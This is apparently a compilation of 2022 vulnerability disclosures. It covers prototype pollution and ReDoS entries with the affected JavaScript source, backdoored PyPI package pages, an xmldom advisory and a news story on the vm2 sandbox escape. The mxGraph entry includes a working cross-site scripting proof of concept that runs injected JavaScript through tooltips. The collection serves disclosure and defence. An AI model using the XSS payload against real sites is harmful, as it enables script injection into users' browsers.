Prototype pollution vulnerability in tschaub gh-pages 3.1.0 via the partial variable in util.js.

const path \= require('path'); const Git \= require('./git'); const async \= require('async'); const fs \= require('fs-extra'); /\*\* \* Generate a list of unique directory paths given a list of file paths. \* @param {Array.<string>} files List of file paths. \* @return {Array.<string>} List of directory paths. \*/ const uniqueDirs \= (exports.uniqueDirs \= function(files) { const dirs \= {}; files.forEach(filepath \=> { const parts \= path.dirname(filepath).split(path.sep); let partial \= parts\[0\] || '/'; dirs\[partial\] \= true; for (let i \= 1, ii \= parts.length; i < ii; ++i) { partial \= path.join(partial, parts\[i\]); dirs\[partial\] \= true; } }); return Object.keys(dirs); }); /\*\* \* Sort function for paths. Sorter paths come first. Paths of equal length are \* sorted alphanumerically in path segment order. \* @param {string} a First path. \* @param {string} b Second path. \* @return {number} Comparison. \*/ const byShortPath \= (exports.byShortPath \= (a, b) \=> { const aParts \= a.split(path.sep); const bParts \= b.split(path.sep); const aLength \= aParts.length; const bLength \= bParts.length; let cmp \= 0; if (aLength < bLength) { cmp \= \-1; } else if (aLength \> bLength) { cmp \= 1; } else { let aPart, bPart; for (let i \= 0; i < aLength; ++i) { aPart \= aParts\[i\]; bPart \= bParts\[i\]; if (aPart < bPart) { cmp \= \-1; break; } else if (aPart \> bPart) { cmp \= 1; break; } } } return cmp; }); /\*\* \* Generate a list of directories to create given a list of file paths. \* @param {Array.<string>} files List of file paths. \* @return {Array.<string>} List of directory paths ordered by path length. \*/ const dirsToCreate \= (exports.dirsToCreate \= function(files) { return uniqueDirs(files).sort(byShortPath); }); /\*\* \* Copy a file. \* @param {Object} obj Object with src and dest properties. \* @param {function(Error)} callback Callback \*/ const copyFile \= (exports.copyFile \= function(obj, callback) { let called \= false; function done(err) { if (!called) { called \= true; callback(err); } } const read \= fs.createReadStream(obj.src); read.on('error', err \=> { done(err); }); const write \= fs.createWriteStream(obj.dest); write.on('error', err \=> { done(err); }); write.on('close', () \=> { done(); }); read.pipe(write); }); /\*\* \* Make directory, ignoring errors if directory already exists. \* @param {string} path Directory path. \* @param {function(Error)} callback Callback. \*/ function makeDir(path, callback) { fs.mkdir(path, err \=> { if (err) { // check if directory exists fs.stat(path, (err2, stat) \=> { if (err2 || !stat.isDirectory()) { callback(err); } else { callback(); } }); } else { callback(); } }); } /\*\* \* Copy a list of files. \* @param {Array.<string>} files Files to copy. \* @param {string} base Base directory. \* @param {string} dest Destination directory. \* @return {Promise} A promise. \*/ exports.copy \= function(files, base, dest) { return new Promise((resolve, reject) \=> { const pairs \= \[\]; const destFiles \= \[\]; files.forEach(file \=> { const src \= path.resolve(base, file); const relative \= path.relative(base, src); const target \= path.join(dest, relative); pairs.push({ src: src, dest: target }); destFiles.push(target); }); async.eachSeries(dirsToCreate(destFiles), makeDir, err \=> { if (err) { return reject(err); } async.each(pairs, copyFile, err \=> { if (err) { return reject(err); } else { return resolve(); } }); }); }); }; exports.getUser \= function(cwd) { return Promise.all(\[ new Git(cwd).exec('config', 'user.name'), new Git(cwd).exec('config', 'user.email') \]) .then(results \=> { return {name: results\[0\].output.trim(), email: results\[1\].output.trim()}; }) .catch(err \=> { // git config exits with 1 if name or email is not set return null; }); };

CVE-2022-37611: gh-pages/util.js at e363b144defe8e555f5a54251a6f7f1297c0e3f6 · tschaub/gh-pages

mxGraph v4.2.2 was discovered to contain a cross-site scripting (XSS) vulnerability via the setTooltips() function.

poc detail

First download the source code from github GitHub - jgraph/mxgraph: mxGraph is a fully client side JavaScript diagramming library and then put the poc.html into the folder mxgraph-master\\javascript\\examples,and open the poc.html with browser mouse over the node and then js code will be executed

 here is the call stack 。when setooltips is true，mxTooltipHandler use show method which use innerhtml to show the custom parameter

poc.html

    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta http-equiv="X-UA-Compatible" content="ie=edge">
        <title>Cell 的提示功能</title>
    
        <script>
            mxBasePath = '../src';
        </script>
        
        <script src="../src/js/mxClient.js"></script>
    
        <script>
            function main(container){
                if (!mxClient.isBrowserSupported())
                {
                    mxUtils.error('Browser is not supported!', 200, false);
                }
                else
                {
                 
                    var graph = new mxGraph(container);
               
                    graph.setEnabled(true);  
                   
                    graph.setResizeContainer(true); 
                    
                    graph.setCellsResizable(true); 
    
                    graph.setTooltips(true)
                   
                    graph.getCursorForCell = function (cell) {
                        if (cell != null && cell.value != null && cell.vertex == 1) {
                            return 'pointer';
                        }
                    };
    
                    var parent = graph.getDefaultParent();
                    
                    graph.getModel().beginUpdate();
                    try
                    {
                        var v1 = graph.insertVertex(parent, null, '<iframe src=javascript:alert(1)>', 20, 20, 80, 30);
                        console.log(v1)
                        var v2 = graph.insertVertex(parent, null, 'Tooltip2', 200, 200, 80, 30);
                    }
                    finally
                    {
                      
                        graph.getModel().endUpdate();
                    }
                }
            };
        </script>
    
    </head>
    <body onload="main(document.getElementById('graphContainer'))">
        <div id="graphContainer"
            style="position:relative;overflow:hidden;width:321px;height:241px;background:url('editors/images/grid.gif');cursor:default;">
        </div>
    </body>
    </html>

CVE-2022-40440: Home · SxB64/mxgraph-xss-vul Wiki

Prototype pollution vulnerability in function resolveShims in resolve-shims.js in thlorenz browserify-shim 3.8.15 via the k variable in resolve-shims.js.

'use strict'; var path \= require('path') , fs \= require('fs') , util \= require('util') , parseInlineShims \= require('./parse-inline-shims') , mothership \= require('mothership') , format \= require('util').format var shimsCache \= {} , shimsByPath \= {}; function inspect(obj, depth) { return util.inspect(obj, false, depth || 5, true); } function isPath(s) { return (/^\[.\]{0,2}\[/\\\\\]/).test(s); } function validate(key, config, dir) { var msg , details \= 'When evaluating shim "' + key + '": ' + inspect(config) + '\\ninside ' + dir + '\\n'; if (!config.hasOwnProperty('exports')) { msg \= 'browserify-shim needs at least a path and exports to do its job, you are missing the exports. ' + '\\nIf this module has no exports, specify exports as null.' throw new Error(details + msg); } } function updateCache(packageDir, pack, resolvedShims, exposeGlobals) { shimsCache\[packageDir\] \= { pack: pack, shims: resolvedShims, exposeGlobals: exposeGlobals }; Object.keys(resolvedShims).forEach(function(fullPath) { var shim \= resolvedShims\[fullPath\]; validate(fullPath, shim, packageDir); shimsByPath\[fullPath\] \= shim; }); } function resolveDependsRelativeTo(dir, browser, depends, packDeps, messages) { var resolved; if (!depends) return undefined; return Object.keys(depends).reduce(function (acc, k) { if (browser\[k\]){ acc\[k\] \= depends\[k\]; messages.push(format('Found depends "%s" exposed in browser field', k)); } else if (!isPath(k)) { acc\[k\] \= depends\[k\]; if (packDeps\[k\]) { messages.push(format('Found depends "%s" as an installed dependency of the package', k)); } else { messages.push(format('WARNING, depends "%s" is not a path, nor is it exposed in the browser field, nor was it found in package dependencies.', k)); } } else { // otherwise resolve the path resolved \= path.resolve(dir, k); acc\[resolved\] \= depends\[k\]; messages.push(format('Depends "%s" was resolved to be at \[%s\]', k, resolved)); } return acc; }, {}) } function resolvePaths (packageDir, shimFileDir, browser, shims, packDeps, messages) { return Object.keys(shims) .reduce(function (acc, relPath) { var shim \= shims\[relPath\]; var exposed \= browser\[relPath\]; var shimPath; if (exposed) { // lib exposed under different name/path in package.json's browser field // and it is referred to by this alias in the shims (either external or in package.json) // i.e.: 'non-cjs': { ... } -> browser: { 'non-cjs': './vendor/non-cjs.js } shimPath \= path.resolve(packageDir, exposed); messages.push(format('Found "%s" in browser field referencing "%s" and resolved it to "%s"', relPath, exposed, shimPath)); } else if (shimFileDir) { // specified via relative path to shim file inside shim file // i.e. './vendor/non-cjs': { exports: .. } shimPath \= path.resolve(shimFileDir, relPath); messages.push(format('Resolved "%s" found in shim file to "%s"', relPath, shimPath)); } else { // specified via relative path in package.json browserify-shim config // i.e. 'browserify-shim': { './vendor/non-cjs': 'noncjs' } shimPath \= path.resolve(packageDir, relPath); messages.push(format('Resolved "%s" found in package.json to "%s"', relPath, shimPath)); } var depends \= resolveDependsRelativeTo(shimFileDir || packageDir, browser, shim.depends, packDeps, messages); acc\[shimPath\] \= { exports: shim.exports, depends: depends }; return acc; }, {}); } function mapifyExposeGlobals(exposeGlobals) { return Object.keys(exposeGlobals) .reduce(function (acc, k) { var val \= exposeGlobals\[k\]; var parts \= val.split(':'); if (parts.length < 2 || !parts\[1\].length) { throw new Error( 'Expose Globals need to have the format "global:expression.\\n"' + inspect({ key: k, value: val }) + 'does not.' ); } // this also handle unlikely cases of 'global:\_.someFunc(':')' with a \`:\` in the actual global expression parts.shift(); acc\[k\] \= parts.join(':'); return acc; }, {}); } function separateExposeGlobals(shims) { var onlyShims \= {} , exposeGlobals \= {}; Object.keys(shims).forEach(function (k) { var val \= shims\[k\] , exp \= val && val.exports; if (exp && /^global\\:/.test(exp)) { exposeGlobals\[k\] \= exp; } else { onlyShims\[k\] \= val; } }); return { shims: onlyShims, exposeGlobals: mapifyExposeGlobals(exposeGlobals) }; } function resolveFromShimFile(packageDir, pack, shimField, messages) { var shimFile \= path.join(packageDir, shimField) , shimFileDir \= path.dirname(shimFile); var allShims \= require(shimFile); var separated \= separateExposeGlobals(allShims); var resolvedShims \= resolvePaths(packageDir, shimFileDir, pack.browser || {}, separated.shims, pack.dependencies || {}, messages); return { shims: resolvedShims, exposeGlobals: separated.exposeGlobals }; } function resolveInlineShims(packageDir, pack, shimField, messages) { var allShims \= parseInlineShims(shimField); var separated \= separateExposeGlobals(allShims); var resolvedShims \= resolvePaths(packageDir, null, pack.browser || {}, separated.shims, pack.dependencies || {}, messages); return { shims: resolvedShims, exposeGlobals: separated.exposeGlobals }; } var resolve \= module.exports \= function resolveShims (file, messages, cb) { // find the package.json that defines browserify-shim config for this file mothership(file, function (pack) { return !! pack\['browserify-shim'\] }, function (err, res) { if (err) return cb(err); if (!res || !res.pack) return cb(new Error('Unable to find a browserify-shim config section in the package.json for ' + file)); var pack \= res.pack; var packFile \= res.path; var packageDir \= path.dirname(packFile); // we cached this before which means it was also grouped by file var cached \= shimsCache\[packageDir\]; // if it was cached, that means any package fixes were applied as well if (cached) { return cb(null, { package\_json : packFile , packageDir : packageDir , resolvedPreviously : true , shim : shimsByPath\[file\] , exposeGlobals : cached.exposeGlobals , browser : pack.browser , 'browserify-shim' : pack\['browserify-shim'\] , dependencies : pack.dependencies }); } try { pack \= require(packFile); var shimField \= pack\['browserify-shim'\]; if (!shimField) return cb(null, { package\_json: packFile, shim: undefined }); var resolved \= typeof shimField \=== 'string' ? resolveFromShimFile(packageDir, pack, shimField, messages) : resolveInlineShims(packageDir, pack, shimField, messages); messages.push({ resolved: resolved.shims }); updateCache(packageDir, pack, resolved.shims, resolved.exposeGlobals); cb(null, { package\_json : packFile , packageDir : packageDir , shim : shimsByPath\[file\] , exposeGlobals : resolved.exposeGlobals , browser : pack.browser , 'browserify-shim' : pack\['browserify-shim'\] , dependencies : pack.dependencies }); } catch (err) { console.trace(); return cb(err); } }); }

CVE-2022-37617: browserify-shim/resolve-shims.js at 464b32bbe142664cd9796059798f6c738ea3de8f · thlorenz/browserify-shim

The d8s-html package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-urls package. The affected version is 0.1.0.

**Project description**

**Democritus Html**

      

Democritus functions\[1\] for working with HTML.

\[1\] Democritus functions are _simple, effective, modular, well-tested, and well-documented_ Python functions.

We use d8s (pronounced "dee-eights") as an abbreviation for democritus (you can read more about this here).

**Installation**

    pip install d8s-html
    

**Usage**

You import the library like:

from d8s\_html import \*

Once imported, you can use any of the functions listed below.

**Functions**

*   def html\_text(html\_content: StringOrBeautifulSoupObject) \-> str:
        """."""
    
*   def html\_unescape(html\_content: StringOrBeautifulSoupObject) \-> str:
        """."""
    
*   def html\_escape(html\_content: StringOrBeautifulSoupObject) \-> str:
        """."""
    
*   def html\_to\_markdown(html\_content: StringOrBeautifulSoupObject, \*\*kwargs) \-> str:
        """Convert the html string to markdown."""
    
*   def html\_find\_comments(html\_content: StringOrBeautifulSoupObject) \-> str:
        """Get a list of all of the comments in the html strings."""
    
*   def html\_soupify(html\_string: str, parser: str \= 'html.parser') \-> bs4.BeautifulSoup:
        """Return an instance of beautifulsoup with the html."""
    
*   def html\_remove\_tags(html\_content: StringOrBeautifulSoupObject) \-> bs4.BeautifulSoup:
        """."""
    
*   def html\_remove\_element(html\_content: StringOrBeautifulSoupObject, element\_tag: str) \-> bs4.BeautifulSoup:
        """."""
    
*   def html\_find\_css\_path(html\_content: StringOrBeautifulSoupObject, css\_path: str) \-> ListOfBeautifulSoupTags:
        """Find the given css\_path in the html\_content."""
    
*   def html\_elements\_with\_class(
        html\_content: StringOrBeautifulSoupObject, html\_element\_class: str
    ) \-> ListOfBeautifulSoupTags:
        """Find all elements with the given class from the html string."""
    
*   def html\_elements\_with\_id(html\_content: StringOrBeautifulSoupObject, html\_element\_id: str) \-> ListOfBeautifulSoupTags:
        """Find all elements with the given html\_element\_id from the html\_content."""
    
*   def html\_elements\_with\_tag(html\_content: StringOrBeautifulSoupObject, tag: str) \-> ListOfBeautifulSoupTags:
        """."""
    
*   def html\_headings\_table\_of\_contents(html\_content: StringOrBeautifulSoupObject) \-> ListOfBeautifulSoupTags:
        """."""
    
*   def html\_headings\_table\_of\_contents\_string(
        html\_content: StringOrBeautifulSoupObject, \*, indentation: str \= '  '
    ) \-> str:
        """."""
    
*   def html\_headings(html\_content: StringOrBeautifulSoupObject) \-> ListOfBeautifulSoupTags:
        """."""
    
*   def html\_to\_json(html\_content: StringOrBeautifulSoupObject, \*, convert\_only\_tables: bool \= False):
        """Convert the html to json using https://gitlab.com/fhightower/html-to-json."""
    
*   def html\_soupify\_first\_arg\_string(func):
        """Return a Beautiful Soup instance of the first argument (if it is a string)."""
    

**Development**

👋  If you want to get involved in this project, we have some short, helpful guides below:

*   contribute to this project 🥇
*   test it 🧪
*   lint it 🧹
*   explore it 🔭

If you have any questions or there is anything we did not cover, please raise an issue and we'll be happy to help.

**Credits**

This package was created with Cookiecutter and Floyd Hightower's Python project template.

**Download files**

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

**Source Distribution****Built Distribution**

CVE-2022-41385: d8s-html

The d8s-yaml package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-file-system package. The affected version is 0.1.0.

**Project description**

**Democritus Yaml**

      

Democritus functions\[1\] for working with YAML.

\[1\] Democritus functions are _simple, effective, modular, well-tested, and well-documented_ Python functions.

We use d8s (pronounced "dee-eights") as an abbreviation for democritus (you can read more about this here).

**Installation**

    pip install d8s-yaml
    

**Usage**

You import the library like:

from d8s\_yaml import \*

Once imported, you can use any of the functions listed below.

**Functions**

*   def yaml\_files(path, \*, include\_yml\_extensions: bool \= False):
        """."""
    
*   def yaml\_read(yaml\_data: str):
        """."""
    
*   def is\_yaml(possible\_yaml\_data: str) \-> bool:
        """."""
    
*   def yaml\_write(data: Json, \*\*kwargs) \-> str:
        """."""
    
*   def yaml\_clean(yaml\_data: str) \-> str:
        """Standardize the given yaml data."""
    
*   def yaml\_standardize(yaml\_data: str) \-> str:
        """Standardize the given yaml data by reading and writing it."""
    
*   def yaml\_sort(yaml\_data: str) \-> str:
        """."""
    

**Development**

👋  If you want to get involved in this project, we have some short, helpful guides below:

*   contribute to this project 🥇
*   test it 🧪
*   lint it 🧹
*   explore it 🔭

If you have any questions or there is anything we did not cover, please raise an issue and we'll be happy to help.

**Credits**

This package was created with Cookiecutter and Floyd Hightower's Python project template.

**Download files**

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

**Source Distribution****Built Distribution**

CVE-2022-41380: d8s-yaml

### Impact
A prototype pollution vulnerability exists in the function copy in dom.js in the xmldom (published as @xmldom/xmldom) package before 0.8.3.

### Patches
Update to `@xmldom/xmldom@0.8.3` or higher or to `@xmldom/xmldom@0.9.0-beta.2` or higher if you are on the dist-tag `next`.

### Workarounds
No, if you can not update to v0.8.3, please let us know, we would be able to also provide a patch update for version 0.7.x if required.

### References
https://github.com/xmldom/xmldom/pull/437

### For more information
If you have any questions or comments about this advisory:
* Email us at security@xmldom.org
* Add information to https://github.com/xmldom/xmldom/issue/436

**Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in @xmldom/xmldom and xmldom**

Moderate severity GitHub Reviewed Published Oct 11, 2022 in xmldom/xmldom

**Package**

npm @xmldom/xmldom (npm)

**Affected versions**

< 0.8.3

\= 0.9.0-beta.1

**Patched versions**

0.8.3

0.9.0-beta.2

npm xmldom (npm)

<= 0.6.0

None

**Description**

**Impact**

A prototype pollution vulnerability exists in the function copy in dom.js in the xmldom (published as @xmldom/xmldom) package before 0.8.3.

**Patches**

Update to @xmldom/xmldom@0.8.3 or higher or to @xmldom/xmldom@0.9.0-beta.2 or higher if you are on the dist-tag next.

**Workarounds**

No, if you can not update to v0.8.3, please let us know, we would be able to also provide a patch update for version 0.7.x if required.

**References**

xmldom/xmldom#437

**For more information**

If you have any questions or comments about this advisory:

*   Email us at security@xmldom.org
*   Add information to https://github.com/xmldom/xmldom/issue/436

**References**

*   GHSA-9pgh-qqpf-7wqj
*   https://nvd.nist.gov/vuln/detail/CVE-2022-37616
*   xmldom/xmldom#436
*   xmldom/xmldom#437
*   https://github.com/xmldom/xmldom/blob/bc36efddf9948aba15618f85dc1addfc2ac9d7b2/lib/dom.js#L1
*   https://github.com/xmldom/xmldom/blob/bc36efddf9948aba15618f85dc1addfc2ac9d7b2/lib/dom.js#L3

 karfau published the maintainer security advisory

Oct 11, 2022

**Severity**

Moderate

6.4

/ 10

**CVSS base metrics**

Attack vector

Local

Attack complexity

High

Privileges required

Low

User interaction

None

Scope

Changed

Confidentiality

None

Integrity

High

Availability

Low

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:L

**Weaknesses**

CWE-1321

**CVE ID**

CVE-2022-37616

**GHSA ID**

GHSA-9pgh-qqpf-7wqj

**Source code**

xmldom/xmldom

**Credits**

*    Supraja9726

Checking history

See something to contribute? Suggest improvements for this vulnerability.

GHSA-9pgh-qqpf-7wqj: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in @xmldom/xmldom and xmldom

Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Profile Builder plugin <= 3.6.0 at WordPress allows uploading the JSON file and updating the options. Requires Import and Export add-on.

CVE-2021-36915: Profile Builder – User Profile & User Registration Forms

A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the resourcePath variable in interpolateName.js.

'use strict'; const path \= require('path'); const emojisList \= require('emojis-list'); const getHashDigest \= require('./getHashDigest'); const emojiRegex \= /\[\\uD800-\\uDFFF\]./; const emojiList \= emojisList.filter((emoji) \=> emojiRegex.test(emoji)); const emojiCache \= {}; function encodeStringToEmoji(content, length) { if (emojiCache\[content\]) { return emojiCache\[content\]; } length \= length || 1; const emojis \= \[\]; do { if (!emojiList.length) { throw new Error('Ran out of emoji'); } const index \= Math.floor(Math.random() \* emojiList.length); emojis.push(emojiList\[index\]); emojiList.splice(index, 1); } while (\--length \> 0); const emojiEncoding \= emojis.join(''); emojiCache\[content\] \= emojiEncoding; return emojiEncoding; } function interpolateName(loaderContext, name, options) { let filename; const hasQuery \= loaderContext.resourceQuery && loaderContext.resourceQuery.length \> 1; if (typeof name \=== 'function') { filename \= name( loaderContext.resourcePath, hasQuery ? loaderContext.resourceQuery : undefined ); } else { filename \= name || '\[hash\].\[ext\]'; } const context \= options.context; const content \= options.content; const regExp \= options.regExp; let ext \= 'bin'; let basename \= 'file'; let directory \= ''; let folder \= ''; let query \= ''; if (loaderContext.resourcePath) { const parsed \= path.parse(loaderContext.resourcePath); let resourcePath \= loaderContext.resourcePath; if (parsed.ext) { ext \= parsed.ext.substr(1); } if (parsed.dir) { basename \= parsed.name; resourcePath \= parsed.dir + path.sep; } if (typeof context !== 'undefined') { directory \= path .relative(context, resourcePath + '\_') .replace(/\\\\/g, '/') .replace(/\\.\\.(\\/)?/g, '\_$1'); directory \= directory.substr(0, directory.length \- 1); } else { directory \= resourcePath.replace(/\\\\/g, '/').replace(/\\.\\.(\\/)?/g, '\_$1'); } if (directory.length \=== 1) { directory \= ''; } else if (directory.length \> 1) { folder \= path.basename(directory); } } if (loaderContext.resourceQuery && loaderContext.resourceQuery.length \> 1) { query \= loaderContext.resourceQuery; const hashIdx \= query.indexOf('#'); if (hashIdx \>= 0) { query \= query.substr(0, hashIdx); } } let url \= filename; if (content) { // Match hash template url \= url // \`hash\` and \`contenthash\` are same in \`loader-utils\` context // let's keep \`hash\` for backward compatibility .replace( /\\\[(?:(\[^:\\\]\]+):)?(?:hash|contenthash)(?::(\[a-z\]+\\d\*))?(?::(\\d+))?\\\]/gi, (all, hashType, digestType, maxLength) \=> getHashDigest(content, hashType, digestType, parseInt(maxLength, 10)) ) .replace(/\\\[emoji(?::(\\d+))?\\\]/gi, (all, length) \=> encodeStringToEmoji(content, parseInt(length, 10)) ); } url \= url .replace(/\\\[ext\\\]/gi, () \=> ext) .replace(/\\\[name\\\]/gi, () \=> basename) .replace(/\\\[path\\\]/gi, () \=> directory) .replace(/\\\[folder\\\]/gi, () \=> folder) .replace(/\\\[query\\\]/gi, () \=> query); if (regExp && loaderContext.resourcePath) { const match \= loaderContext.resourcePath.match(new RegExp(regExp)); match && match.forEach((matched, i) \=> { url \= url.replace(new RegExp('\\\\\[' + i + '\\\\\]', 'ig'), matched); }); } if ( typeof loaderContext.options \=== 'object' && typeof loaderContext.options.customInterpolateName \=== 'function' ) { url \= loaderContext.options.customInterpolateName.call( loaderContext, url, name, options ); } return url; } module.exports \= interpolateName;

CVE-2022-37599: loader-utils/interpolateName.js at d9f4e23cf411d8556f8bac2d3bf05a6e0103b568 · webpack/loader-utils

Prototype pollution vulnerability in beautify-web js-beautify 1.13.7 via the name variable in options.js.

/\*jshint node:true \*/ /\* The MIT License (MIT) Copyright (c) 2007-2018 Einar Lielmanis, Liam Newman, and contributors. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. \*/ 'use strict'; function Options(options, merge\_child\_field) { this.raw\_options \= \_mergeOpts(options, merge\_child\_field); // Support passing the source text back with no change this.disabled \= this.\_get\_boolean('disabled'); this.eol \= this.\_get\_characters('eol', 'auto'); this.end\_with\_newline \= this.\_get\_boolean('end\_with\_newline'); this.indent\_size \= this.\_get\_number('indent\_size', 4); this.indent\_char \= this.\_get\_characters('indent\_char', ' '); this.indent\_level \= this.\_get\_number('indent\_level'); this.preserve\_newlines \= this.\_get\_boolean('preserve\_newlines', true); this.max\_preserve\_newlines \= this.\_get\_number('max\_preserve\_newlines', 32786); if (!this.preserve\_newlines) { this.max\_preserve\_newlines \= 0; } this.indent\_with\_tabs \= this.\_get\_boolean('indent\_with\_tabs', this.indent\_char \=== '\\t'); if (this.indent\_with\_tabs) { this.indent\_char \= '\\t'; // indent\_size behavior changed after 1.8.6 // It used to be that indent\_size would be // set to 1 for indent\_with\_tabs. That is no longer needed and // actually doesn't make sense - why not use spaces? Further, // that might produce unexpected behavior - tabs being used // for single-column alignment. So, when indent\_with\_tabs is true // and indent\_size is 1, reset indent\_size to 4. if (this.indent\_size \=== 1) { this.indent\_size \= 4; } } // Backwards compat with 1.3.x this.wrap\_line\_length \= this.\_get\_number('wrap\_line\_length', this.\_get\_number('max\_char')); this.indent\_empty\_lines \= this.\_get\_boolean('indent\_empty\_lines'); // valid templating languages \['django', 'erb', 'handlebars', 'php', 'smarty'\] // For now, 'auto' = all off for javascript, all on for html (and inline javascript). // other values ignored this.templating \= this.\_get\_selection\_list('templating', \['auto', 'none', 'django', 'erb', 'handlebars', 'php', 'smarty'\], \['auto'\]); } Options.prototype.\_get\_array \= function(name, default\_value) { var option\_value \= this.raw\_options\[name\]; var result \= default\_value || \[\]; if (typeof option\_value \=== 'object') { if (option\_value !== null && typeof option\_value.concat \=== 'function') { result \= option\_value.concat(); } } else if (typeof option\_value \=== 'string') { result \= option\_value.split(/\[^a-zA-Z0-9\_\\/\\-\]+/); } return result; }; Options.prototype.\_get\_boolean \= function(name, default\_value) { var option\_value \= this.raw\_options\[name\]; var result \= option\_value \=== undefined ? !!default\_value : !!option\_value; return result; }; Options.prototype.\_get\_characters \= function(name, default\_value) { var option\_value \= this.raw\_options\[name\]; var result \= default\_value || ''; if (typeof option\_value \=== 'string') { result \= option\_value.replace(/\\\\r/, '\\r').replace(/\\\\n/, '\\n').replace(/\\\\t/, '\\t'); } return result; }; Options.prototype.\_get\_number \= function(name, default\_value) { var option\_value \= this.raw\_options\[name\]; default\_value \= parseInt(default\_value, 10); if (isNaN(default\_value)) { default\_value \= 0; } var result \= parseInt(option\_value, 10); if (isNaN(result)) { result \= default\_value; } return result; }; Options.prototype.\_get\_selection \= function(name, selection\_list, default\_value) { var result \= this.\_get\_selection\_list(name, selection\_list, default\_value); if (result.length !== 1) { throw new Error( "Invalid Option Value: The option '" + name + "' can only be one of the following values:\\n" + selection\_list + "\\nYou passed in: '" + this.raw\_options\[name\] + "'"); } return result\[0\]; }; Options.prototype.\_get\_selection\_list \= function(name, selection\_list, default\_value) { if (!selection\_list || selection\_list.length \=== 0) { throw new Error("Selection list cannot be empty."); } default\_value \= default\_value || \[selection\_list\[0\]\]; if (!this.\_is\_valid\_selection(default\_value, selection\_list)) { throw new Error("Invalid Default Value!"); } var result \= this.\_get\_array(name, default\_value); if (!this.\_is\_valid\_selection(result, selection\_list)) { throw new Error( "Invalid Option Value: The option '" + name + "' can contain only the following values:\\n" + selection\_list + "\\nYou passed in: '" + this.raw\_options\[name\] + "'"); } return result; }; Options.prototype.\_is\_valid\_selection \= function(result, selection\_list) { return result.length && selection\_list.length && !result.some(function(item) { return selection\_list.indexOf(item) \=== \-1; }); }; // merges child options up with the parent options object // Example: obj = {a: 1, b: {a: 2}} // mergeOpts(obj, 'b') // // Returns: {a: 2} function \_mergeOpts(allOptions, childFieldName) { var finalOpts \= {}; allOptions \= \_normalizeOpts(allOptions); var name; for (name in allOptions) { if (name !== childFieldName) { finalOpts\[name\] \= allOptions\[name\]; } } //merge in the per type settings for the childFieldName if (childFieldName && allOptions\[childFieldName\]) { for (name in allOptions\[childFieldName\]) { finalOpts\[name\] \= allOptions\[childFieldName\]\[name\]; } } return finalOpts; } function \_normalizeOpts(options) { var convertedOpts \= {}; var key; for (key in options) { var newKey \= key.replace(/\-/g, "\_"); convertedOpts\[newKey\] \= options\[key\]; } return convertedOpts; } module.exports.Options \= Options; module.exports.normalizeOpts \= \_normalizeOpts; module.exports.mergeOpts \= \_mergeOpts;

CVE-2022-37609: js-beautify/options.js at 6fa891e982cc3d615eed9a1a20a4fc50721bff16 · beautify-web/js-beautify

Attackers could exploit the "Sandbreak" security bug, which has earned a 10 out of 10 on the CVSS scale, to execute a sandbox escape, achieve RCE, and run shell commands on a hosting machine.

A remote code execution (RCE) vulnerability in a widely used JavaScript sandbox has earned a top rating of 10 on the CVSS vulnerability risk scale; it allows threat actors to execute a sandbox escape and run shell commands on the hosting machine.  

Researchers from cloud security firm Oxeye discovered the dangerous flaw, which they dubbed "Sandbreak" in vm2, a JavaScript sandbox that has more than 16 million monthly downloads, according to its NPM package manager.

"The fact that this vulnerability has the maximum CVSS score of 10 and is extremely popular means its potential impact is widespread and critical," Oxeye architect Yuval Ostrovsky and security researcher Gal Goldshtein wrote in a blog post published Oct. 10.

Oxeye found the flaw on Aug. 16 and informed the project owners two days later. On Aug. 28, GitHub issued CVE-2022-36067 and gave the vulnerability the highest risk rating possible.

The project's maintainers reacted swiftly to issue a patch for Sandbreak in vm2 version 3.9.11, which should be applied by anyone using the sandbox because of the heightened risk of vulnerability, the researchers said.

**Sandboxes: Historically Trustworthy**

Like all sandboxes, vm2 offers an isolated environment where applications can run trusted code, serving a vital purposes in modern applications because developers or network administrators can use them to run programs or open files without affecting the app, system, or platform in which they run.  

Software developers often use sandboxes to test new programming code, and they are well known as an important tool in cybersecurity research, allowing researchers to test potentially malicious software without harming other parts of a network or app environment.

Indeed, the fact that a sandbox is so universally trusted is what makes the Sandbreak flaw so critical and should sound an alarm across all sandbox users to shore up their implementations, the researchers said.

"By their very definition, sandboxes are considered safe places and trusted as mechanisms that isolate potentially dangerous code from our applications," they wrote in the post. "But what would happen if this trust was compromised?"

**Technical Analysis**

Researchers explored just that in their investigation of Sandbreak, which they discovered while analyzing previous security lapses disclosed to the team maintaining vm2.

The bug exists in the vm2 bug reporter, which would allow cyberattackers to abuse the error mechanism in Node.js. They could customize the call stack of an error that occurred in the app to escape the sandbox, the researchers disclosed.

"Customizing the call stack can achieve this by implementing the 'prepareStacktrace' method under the global 'Error' object,'" the researchers explained in the post. "This means that when an error occurs and the 'stack' property of the thrown error object is accessed, Node.js will call this method while providing it with a string representation of the error alongside an array of 'CallSite' objects as arguments."

One of the methods exposed by the CallSite objects because of the issue is "getThis," which is responsible for returning the “this” object that was available in the related stack frame, the researchers found.

